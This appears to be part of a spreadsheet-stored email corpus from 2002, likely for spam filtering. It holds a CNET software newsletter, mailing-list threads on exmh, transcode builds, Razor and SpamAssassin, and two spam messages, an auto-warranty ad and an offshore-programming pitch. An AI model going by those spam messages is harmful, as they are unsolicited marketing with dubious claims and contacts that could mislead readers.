       &lt;FONT size=-1&gt;&lt;B&gt;In Utilities&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhmuHzxvywvjsK-FdLP4R" &gt;RAM Idle Professional 2.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt; &lt;FONT size=-2&gt;License: Free to try; $19.95 to buy&lt;BR&gt;File size:
 1.18MB&lt;BR&gt;Minimum requirements: Windows 95/98/Me/NT/2000/XP
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;Does your computer suffer from long lag times when you open
     programs or load Web pages, choppy multimedia
     playback, crashes, or other symptoms of memory loss? Recover
     system memory and optimize your cache with this cure
     for computer amnesia.&lt;p&gt;
       Want to review RAM Idle Professional? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptAzBCTQXi6pURwMpopriR" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Home &amp; Desktop&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQTa25n32cTYjvQ8Rgn5FR" &gt;Enterprise Theme 2.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free&lt;BR&gt;File size:
 1.71MB&lt;BR&gt;Minimum requirements: Windows 98
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 "Star Trek" fans have another reason to wear pointy ears and
     learn Klingon. The latest iteration of the "Star Trek"
     franchise takes us back to the origins of Federation space
     exploration, in a time before Kirk or Picard. Now you can
     teleport your desktop there as well with this theme
     featuring sounds, icons, wallpapers, and more from the
     newest "Star Trek" show, "Enterprise."&lt;P&gt;
       Want to review Enterprise Theme? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZk8FnrENtDtZs6swzdON9R" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Games&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pyt82qKt2pAEVgnfqGsJuR" &gt;Magic: The Gathering Online 1.0
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free&lt;BR&gt;File size:
 309MB
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 The popular trading card game has gone online. Featuring
     hundreds of cards and an Internet full of opponents, plus
     tournaments and leagues, the action can continue
     indefinitely. And future expansion packs ensure that the
     level of gameplay stays fresh.&lt;P&gt;
       Want to review Magic: The Gathering? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlb7-3Ph3Gl22vbAOyesR" &gt;here&lt;/A&gt;.&lt;p&gt;
       &lt;FONT size=-1&gt;&lt;B&gt;In Web Authoring&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;
       &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfB-MCDTVqS8CMB0qvsZR" &gt;CoffeeCup HTML Editor 9.3
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Free to try; $49 to buy&lt;BR&gt;File size:
 6.81MB&lt;BR&gt;Minimum requirements: Windows 95/98/NT/2000/XP
 &lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 Brew up a Web site that will have your users asking for a
     second cup with this full-featured, easy-to-use HTML editor.
     This program comes packed with prebuilt graphics, icons,
     photos, and JavaScript templates. You'll also find a frame
     designer, a table designer, a font designer, a built-in FTP
     client, and multipage support. Version 9.3 includes
     additional JavaScript templates, a built-in Flash text
     wizard, and right-click FTP functionality.&lt;P&gt;
       Want to review CoffeeCup HTML Editor? Submit your opinion &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4cRP4xca9-0t3VVat9dR" &gt;here&lt;/A&gt;.&lt;p&gt;
 &lt;!-- /picks of the week --&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!-- buzzworthy --&gt;
 &lt;!-- /buzzworthy --&gt;
 &lt;!-- overheard --&gt;
 &lt;A name=h4&gt;&lt;IMG height=19 alt="Overheard on Download.com" src=
 			 "http://www.cnet.com/i/nl/dl/sub_overh.gif" width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG
 			 height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;b&gt;Last week I asked whether Audiogalaxy could survive only offering non-infringing files. Here are a few of your answers:&lt;/b&gt;
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"Doomed. Completely, absolutely, utterly!"&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 Just about everyone agreed that Audiogalaxy is as dead as Napster.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"Each time a file-sharing service is canceled, a bunch of new ones appear."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 But some people always find a silver lining.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"I might use a file-sharing service for a lot of things, particularly drivers, fixes, and patches."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 A P2P network offering drivers seems like a great idea to me.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"I was an occasional Audiogalaxy participant (birthday CD burned to include songs that were hits the year you were born). Now I'll just opt for a birthday card and a bottle of wine."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 I included this comment because I really like the birthday idea.
 &lt;p&gt;&lt;FONT size="-1" color=006633&gt;&lt;i&gt;"It seems once again rather than release a file download site for music, at a fee per download, the music companies spend money on trying to stop download sites like Audiogalaxy."&lt;/i&gt;&lt;/font&gt;&lt;p&gt;
 With its popularity, file swapping should be an amazing opportunity for record companies, but they must not be smart enough to figure out how to make it work.
 &lt;!-- /overheard --&gt;
         &lt;p&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;!-- /Main body content --&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=616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width=616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href="http://clickthru.online.com/Click?q=11-l8riI2-4W1ZepA3X3VynhNBuCqcR" &gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375"
 height="18" border="0" alt="Sign up for more free newsletters from
 CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=27-z9RmzII6499dIu9akMZByjRR83n9asRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email='&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a
 href="http://www.cnet.com/subscription/0-16335-7-6770019.html"&gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKwW-jpY0VXXjhrHNHdR"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width=616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width=616 bgcolor="#ffcc00" cellpadding="0" cellspacing="0"
 border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img
 src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7TAxDGJlh9GpMUHM3rR" &gt;&lt;img
 src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37"
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIFs_xSIgsPj9y-DzbW-iR" &gt;&lt;font
 color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOskwmhLbDr4q1O7VpJlR" &gt;&lt;font
 color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCXNkilpVb8HYULuonX9R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGWMerDxsIC1b2OB8OEuR" &gt;&lt;font
 color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKF_SjcSwxhOmI_uIUEksR" &gt;&lt;font
 color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=616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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e415-01&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d1-ulDz-AE-JtAOi9gGnpJ2n61kyRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [NYT] Real Source
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Well, just to take this thread off topic - does anyone know what's
 &gt; involved in serving streaming video? I assume that
 &gt;  the only practical alternatives are MS and Real, and that it's likely
 &gt; to cost some $$$ for the software.
 A quick Google search turns up:
 http://developer.apple.com/darwin/projects/streaming/index.html
 Darwin streaming media server
 http://mpeg4ip.sourceforge.net/index.php
 MPEG4IP: Open Source, Open Standards, Open Streaming
 MPEG4IP provides an end-to-end system to explore MPEG-4 multimedia. The
 package includes many existing open source packages and the "glue" to
 integrate them together. This is a tool for streaming video and audio that
 is standards-oriented and free from proprietary protocols and extensions.
 Provided are an MPEG-4 AAC audio encoder, an MP3 encoder, two MPEG-4 video
 encoders, an MP4 file creator and hinter, an IETF standards-based streaming
 server, and an MPEG-4 player that can both stream and playback from local
 file.
 Our development is focused on the Linux platform, and has been ported to
 Windows, Solaris, FreeBSD, BSD/OS and Mac OS X, but it should be relatively
 straight-forward to use on other platforms. Many of the included packages
 are multi-platform already.
 Both sound interesting, and low $$.
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 10:46 PM 7/23/02 -0700, Gordon Mohr wrote:
 &gt;Surprised this wasn't already passed through here: about a 
 &gt;week and a half ago, Walter Mossberg reviewed ChoicEMail, 
 &gt;a spam-fighting tool where new, unknown senders have to 
 &gt;request passage through your whitelist-based mailwall.
 Lately, a fairly large % of the spam I've been getting has been coming from
 spam systems that forge my own address as the "from" address... Those spam
 messages would get through any whitelist I set up (especially since I email
 stuff to myself all the time).  If whitelists become more popular, I
 imagine spammers will resort to doing that for the majority of their spams,
 making whitelists less helpful.
 Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so
 special that people should need to fill out a special form just to send me
 email.  I could see certain friends of mine getting fairly annoyed
 (especially those with multiple email addresses...).
 -Mike
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MyIncErrors
</t>
  </si>
  <si>
    <t xml:space="preserve">I recently transfered my exmh setup to a new system, and now
 all my email ends up in Mail/MyIncErrors folder.  This is true for 
 inbox or presort options.  I'm having difficulty finding this condition
 in the documention.  Suggestions?
 Cheers,
 Karl
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 08:59, Matthias Saou wrote:
 &gt; Once upon a time, Alvie wrote :
 &gt; 
 &gt; &gt; Thanks, I seem to be having problems with rebuilding transcode from SRC
 &gt; &gt; it gets confused from previous errors and gives up.
 &gt; 
 &gt; Could you give the output of the error?
 &gt;
 This is only the last part of it.I used 'rpmbuild --rebuild --without avifile transcode.0.6.1-fr2.src.rpm'.
 af6_decore.cpp:305: 'WAVEFORMATEX' is used as a type, but is not defined
 as a
    type.
 af6_decore.cpp:306: parse error before `if'
 af6_decore.cpp:308: syntax error before `-&gt;' token
 af6_decore.cpp:313: `wvFmt' was not declared in this scope
 af6_decore.cpp:313: `avm_wave_format_name' was not declared in this
 scope
 af6_decore.cpp:314: `wvFmt' was not declared in this scope
 af6_decore.cpp:315: `wvFmt' was not declared in this scope
 af6_decore.cpp:316: `wvFmt' was not declared in this scope
 af6_decore.cpp:316: ISO C++ forbids declaration of `fprintf' with no
 type
 af6_decore.cpp:316: redefinition of `int fprintf'
 af6_decore.cpp:161: `int fprintf' previously defined here
 af6_decore.cpp:316: initializer list being treated as compound
 expression
 af6_decore.cpp:317: 'WAVEFORMATEX' is used as a type, but is not defined
 as a
    type.
 af6_decore.cpp:318: syntax error before `-&gt;' token
 af6_decore.cpp:321: `fmt' was not declared in this scope
 af6_decore.cpp:321: `avm_wave_format_name' was not declared in this
 scope
 af6_decore.cpp:322: `fmt' was not declared in this scope
 af6_decore.cpp:323: `fmt' was not declared in this scope
 af6_decore.cpp:324: `fmt' was not declared in this scope
 af6_decore.cpp:324: ISO C++ forbids declaration of `fprintf' with no
 type
 af6_decore.cpp:324: redefinition of `int fprintf'
 af6_decore.cpp:316: `int fprintf' previously defined here
 af6_decore.cpp:324: initializer list being treated as compound
 expression
 af6_decore.cpp:327: parse error before `if'
 af6_decore.cpp:330: syntax error before `-&gt;' token
 af6_decore.cpp:349: ISO C++ forbids declaration of `samples' with no
 type
 af6_decore.cpp:349: conflicting types for `int samples'
 af6_decore.cpp:290: previous declaration as `unsigned int samples'
 af6_decore.cpp:349: `fmt' was not declared in this scope
 af6_decore.cpp:350: ISO C++ forbids declaration of `buffer_size' with no
 type
 af6_decore.cpp:350: conflicting types for `int buffer_size'
 af6_decore.cpp:288: previous declaration as `unsigned int buffer_size'
 af6_decore.cpp:350: `fmt' was not declared in this scope
 af6_decore.cpp:351: ISO C++ forbids declaration of `buffer' with no type
 af6_decore.cpp:351: conflicting types for `int buffer'
 af6_decore.cpp:291: previous declaration as `char*buffer'
 af6_decore.cpp:351: invalid conversion from `char*' to `int'
 af6_decore.cpp:352: parse error before `if'
 af6_decore.cpp:354: syntax error before `-&gt;' token
 af6_decore.cpp:359: ISO C++ forbids declaration of `fflush' with no type
 af6_decore.cpp:359: redefinition of `int fflush'
 af6_decore.cpp:288: previous declaration as `unsigned int buffer_size'
 af6_decore.cpp:350: `fmt' was not declared in this scope
 af6_decore.cpp:351: ISO C++ forbids declaration of `buffer' with no type
 af6_decore.cpp:351: conflicting types for `int buffer'
 af6_decore.cpp:291: previous declaration as `char*buffer'
 af6_decore.cpp:351: invalid conversion from `char*' to `int'
 af6_decore.cpp:352: parse error before `if'
 af6_decore.cpp:354: syntax error before `-&gt;' token
 af6_decore.cpp:359: ISO C++ forbids declaration of `fflush' with no type
 af6_decore.cpp:359: redefinition of `int fflush'
 af6_decore.cpp:208: `int fflush' previously defined here
 af6_decore.cpp:359: invalid conversion from `_IO_FILE*' to `int'
 af6_decore.cpp:360: `ipipe' was not declared in this scope
 af6_decore.cpp:360: `sync_str' was not declared in this scope
 af6_decore.cpp:360: `sync_str' was not declared in this scope
 af6_decore.cpp:360: ISO C++ forbids declaration of `p_write' with no
 type
 af6_decore.cpp:360: redefinition of `int p_write'
 af6_decore.cpp:209: `int p_write' previously defined here
 af6_decore.cpp:360: initializer list being treated as compound
 expression
 af6_decore.cpp:363: parse error before `while'
 af6_decore.cpp:368: syntax error before `-&gt;' token
 make[3]: *** [af6_decore.lo] Error 1
 make[3]: Leaving directory
 `/usr/src/redhat/BUILD/transcode-0.6.1/import'
 make[2]: *** [all-recursive] Error 1
 make[2]: Leaving directory
 `/usr/src/redhat/BUILD/transcode-0.6.1/import'
 &gt; &gt; Using trancode rpm I can't get transcode command line args to
 &gt; &gt; work.Although it's been a while since I used it - maybe I forgot how!
 &gt;
 This was a dumb mistake on my part. I did'nt have libdvdcss-devel, the
 transcode command line args work fine now, but not so for DVD::RIP.
 Thanks for help
 Alvie
 &gt; I'm encoding a DVD to DivX4 right now on my home computer, and it works
 &gt; fine. My current Red Hat 8.0 build of transcode has avifile support
 &gt; disabled, that may be your problem? It's because gcc 3.2 isn't currently
 &gt; able to recompile avifile... :-/
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 &gt; Load : 0.09 0.12 0.21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</si>
  <si>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Subject: Friends don't let friends swim drunk. Paging Dr. Darwin..
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8272607,1717/
 Date: 2002-09-26T11:26:11+01:00
 (NY Daily News)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-24
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Damian Conway Publishes Exegesis 5
     * 2nd Open Source CMS Conference
 +--------------------------------------------------------------------+
 | Damian Conway Publishes Exegesis 5                                 |
 |   posted by hfb on Friday August 23, @14:06 (perl6)                |
 |   http://use.perl.org/article.pl?sid=02/08/23/187226               |
 +--------------------------------------------------------------------+
 An anonymous coward writes "[0]/. has a [1]link to [2]Damian's
 [3]Exegesis 5"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/23/187226
 Links:
     0. http://www.slashdot.org/
     1. http://developers.slashdot.org/developers/02/08/23/1232230.shtml?tid=145
     2. http://yetanother.org/damian/
     3. http://www.perl.com/lpt/a/2002/08/22/exegesis5.html
 +--------------------------------------------------------------------+
 | 2nd Open Source CMS Conference                                     |
 |   posted by ziggy on Friday August 23, @18:30 (events)             |
 |   http://use.perl.org/article.pl?sid=02/08/23/1837242              |
 +--------------------------------------------------------------------+
 [0]Gregor J. Rothfuss writes "There will be a second [1]Open Source CMS
 conference this fall in Berkeley. We will feature presentations and
 workshops from a wide range of CMS, and would definitely welcome some
 Perl-fu in there as well. Also of interest, our efforts to [2]build
 bridges across CMS. Participate in our [3]mailing list, or better yet,
 [4]show up :)" The [5]first Open Source CMS conference was held in Zurich
 this past March.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/23/1837242
 Links:
     0. mailto:gregor.rothfuss@oscom.org
     1. http://www.oscom.org/conferences/berkeley2002/index.html
     2. http://www.oscom.org/interop.html
     3. http://www.oscom.org/mailing-lists.html
     4. http://www.oscom.org/conferences/berkeley2002/registration_fees.html
     5. http://www.oscom.org/conferences/zurich2002/agenda.html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</si>
  <si>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&gt;
 &gt;	I'll have to try it with another window manager and see if I can
 &gt;get exmh to put it back inside of sane boundaries. I don't have this
 &gt;problem with any other windows, though. Just the exmhunseen window.
 &gt;
 How about enabling the "Show unseen message count in folder cache"
 option? It displays the number of unseen messages next to each folder name
 (if greater than 0), so you don't really need the unseen window unless
 you're using more sequences than just "unseen".
 Paul
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">If you didn't add it when compile would be one way.  Another would be to
 grep your sendmail.cf for the word Milter.
 -----Original Message-----
 From: Julian Bond [mailto:julian_bond@voidstar.com] 
 Sent: Friday, August 23, 2002 2:48 PM
 To: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] Razor with sendmail
 "Bort, Paul" &lt;pbort@tmwsystems.com&gt; wrote:
 &gt;If your sendmail has been compiled with Milter support, you can add 
 &gt;SMRazor easily. We've been using it for a while without problems. 
 &gt;Others on the list have mentioned it as well.
 &gt;
 &gt;http://www.sapros.com/smrazor/
 Is there an easy way to tell if Milter is compiled in?
 -- 
 Julian Bond Email&amp;MSM: julian.bond@voidstar.com
 Webmaster:              http://www.ecademy.com/
 Personal WebLog:       http://www.voidstar.com/
 CV/Resume:          http://www.voidstar.com/cv/
 M: +44 (0)77 5907 2173   T: +44 (0)192 0412 433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
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r_______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranty -- even older cars... nhaxn
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect yourself with an extended warranty for your car, minivan, truck or SUV. Buy DIRECT and SAVE money!
 Extend your existing Warranty.
 Get a new Warranty even if your original Warranty expired.
 Get a FREE NO OBLIGATION Extended Warranty Quote NOW. Find out how much it would cost to Protect YOUR investment. 
 This is a FREE Service.
 Simply fill out our FREE NO OBLIGATION form and 
 find out.
 It's That Easy!
 Visit our website:  
 http://hey11.heyyy.com/extended/warranty.htm
 ================================================
 To be removed, click below and fill out the remove form:
 http://hey11.heyyy.com/removal/remove.htm
 Please allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Custom Software Development Services Available Right Now..
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .txt { font-family: Arial, Helvetica, sans-serif; font-size: 8pt}
 .orng { font-family: Arial, Helvetica, sans-serif; font-size: 12pt; color: #FF3300; font-weight: bold}
 .red { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: bold; color: #006699}
 .wh { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: bold; color: #ffffff}
 .gr { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: bold; color: #666666}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#99CCFF" leftmargin="0" topmargin="10" marginwidth="0" marginheight="0"&gt;
 &lt;table width="600" border="0" cellspacing="2" cellpadding="5" align="center" bgcolor="#336699"&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" rowspan="2"&gt; 
       &lt;p class="txt"&gt;&lt;span class="red"&gt;Dear Sir or Madam,&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         We are glad to deliver cutting-edge solutions to your IT challenges at 
         a quality that is equivalent or superior to that offered by domestic companies, 
         but at a fraction of the cost of domestic development.&lt;br&gt;
         &lt;br&gt;
         We represent a number of well-established companies staffed with over 
         1000 qualified developers with a record of successfully completing hundreds 
         of small and midsize projects and tens of wide-scale projects for Fortune 
         100 corporations.&lt;/p&gt;
       &lt;center&gt;
         &lt;span class=red&gt;From business analysis and consulting to web design, from 
         coding to testing and porting we provide a full cycle of IT services.&lt;br&gt;
         &lt;/span&gt; &lt;br&gt;
       &lt;/center&gt;
       &lt;p class=txt&gt;Working both on-site and offshore our specialists develop and 
         integrate&lt;/p&gt;
       &lt;ul class=red&gt;
         &lt;li&gt;Internet/Intranet/Extranet applications&lt;/li&gt;
         &lt;li&gt;Business applications&lt;/li&gt;
         &lt;li&gt;ERP, CRM systems&lt;/li&gt;
         &lt;li&gt; e-Business (B2B, B2C) solutions&lt;/li&gt;
         &lt;li&gt;Mobile and Wireless applications 
         &lt;li&gt;Desktop applications 
         &lt;li&gt;Data Warehouses 
         &lt;li&gt;Security and Cryptography systems 
       &lt;/ul&gt;
       &lt;p align="right"  class=red&gt;and more...&lt;/p&gt;
       &lt;p class=txt&gt;Our quality is based on developed partnerships with leading 
         IT technology providers, modern project and quality management and exclusive 
         human resources.&lt;/p&gt;
     &lt;/td&gt;
     &lt;td bgcolor="#FFFFFF"&gt; 
       &lt;p align="center"&gt;&lt;br&gt;
         &lt;span class="orng"&gt; Rates only $20 an hour!&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;span class="txt"&gt;&lt;font size="2"&gt;For more info...&lt;b&gt;&lt;a href="mailto:Raymond2@btamail.net.cn,Mr777@libero.it?subject=Please send more info!"&gt;CLICK HERE!!!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;BR&gt;
 		&lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be happy to call you!&lt;/FONT&gt;&lt;BR&gt;
       &lt;p align=center&gt;&lt;span class=orng&gt;&lt;font color="#000000"&gt;Or Call:&lt;/font&gt; 602-640-0095&lt;br&gt;
         &lt;br&gt;
         Cost effective IT solutions&lt;br&gt;
         Experienced teams of specialists&lt;br&gt;
         Fair rates&lt;/span&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" valign="top"&gt; 
       &lt;p class="red"&gt;Here is a list of some of the technologies 
         and platforms that our specialists employ to bring you only the best, 
         most efficient and cost-effective solution:&lt;br&gt;
       &lt;/p&gt;
       &lt;table width="100%" border="0" cellspacing="1" cellpadding="2" class=txt&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt; 
             &lt;p&gt;&lt;b&gt; Application Platforms&lt;br&gt;
               &lt;/b&gt; &lt;span class="gr"&gt;.: .Net&lt;br&gt;
               .: Java2EE&lt;br&gt;
               .: IBM WebSphere Suite&lt;br&gt;
               .: Lotus Domino&lt;br&gt;
               .: BEA WebLogic&lt;br&gt;
               .: ColdFusion&lt;br&gt;
               .: Enhydra&lt;/span&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;center&gt;
               &lt;b&gt; Operating Systems&lt;br&gt;
               &lt;/b&gt;
             &lt;/center&gt;
             &lt;span class="gr"&gt;.: all Windows, Mac,&lt;br&gt;
             and Unix platforms&lt;br&gt;
             .: Epoc&lt;br&gt;
             .: Windows CE&lt;br&gt;
             .: Palm OS&lt;br&gt;
             .: Java2Microedition&lt;/span&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt;&lt;b&gt;Databases&lt;br&gt;
             &lt;/b&gt;&lt;span class="gr"&gt;.: MS SQL&lt;br&gt;
             .: Oracle&lt;br&gt;
             .: DB2&lt;br&gt;
             .: FoxPro&lt;br&gt;
             .: Informix&lt;br&gt;
             .: Sybase&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;p&gt;&lt;b&gt; &lt;b class=txt&gt;Real time embedded systems&lt;br&gt;
               &lt;span class="gr"&gt;.: QNX 4RT&lt;br&gt;
               .: QNX Neutrio RT&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align="center"&gt;&lt;span class=orng&gt;&lt;i&gt;&lt;A HREF="mailto:Raymond2@btamail.net.cn,Mr777@libero.it?subject=I would like a Free quote!"&gt;Free quotes!&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;BR&gt;
 	  &lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be happy to call you!&lt;/FONT&gt;&lt;BR&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="middle" align="center"&gt; 
     &lt;td bgcolor="#6699CC" colspan="2"&gt;&lt;span class="txt"&gt;If you received this letter 
       by mistake please click &lt;A HREF="mailto:Remove-Please@btamail.net.cn?subject=Remove"&gt;Unsubscribe&lt;/a&gt;&lt;/span&gt; 
     &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Re: Custom actions for high scoring spam
</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you Lars for your reply to my query.
 &gt; SA doesnt do any of these. It is probably a function of whatever scanning
 system/MDA
 &gt; you're using (amavis, procmail, whatever). What exactly are you using?
 I am using SpamAssassin as part of the MailScanner package (using sendmail
 as the MTA). It integrates nicely in there, and shares a configuration file
 with SA. All very neat.
 &gt; SA in itself does nothing really. You need a frontend (procmail, amavis,
 etc)
 &gt; at some point in the  mail delivery chain that can hand over the message
 &gt; to SA and do whatever other processing you want.
 I thought that SA rated a message with a certain score, then did a certain
 action (such as store | deliver | delete) based on the configuration given.
 I was hoping there were some other actions that I could custom-program in.
 Again, many thanks,
